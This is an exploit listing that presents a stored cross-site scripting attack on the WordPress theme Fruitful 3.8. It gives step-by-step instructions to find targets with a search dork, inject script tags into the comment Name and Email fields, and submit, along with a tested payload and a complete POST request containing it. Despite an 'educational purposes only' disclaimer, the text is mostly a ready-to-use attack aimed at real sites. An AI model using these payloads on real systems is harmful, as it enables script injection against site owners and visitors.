Exploits / Vulnerability Discovered : 2020-02-17 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress theme fruitful 3.8 persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
.:: Theme Description ::.
Fruitful is Free WordPress responsive theme with powerful theme options panel and simple clean front end design.
.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target With above Dork.
Step 2 - Inject Your Java Script Codes to Name & Email Fields
Step 3 - Click Post Comment
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
comment=XSS :)&author='>"><script>alert(/Xssed By Ultra Security/)</script>&email='>"><script>alert(/Xssed By Ultra Security/)</script>&url=UltraSec.org&submit=Post Comment&comment_post_ID=1&comment_parent=0&akismet_comment_nonce=9cd073a8bd&ak_js=1581431825145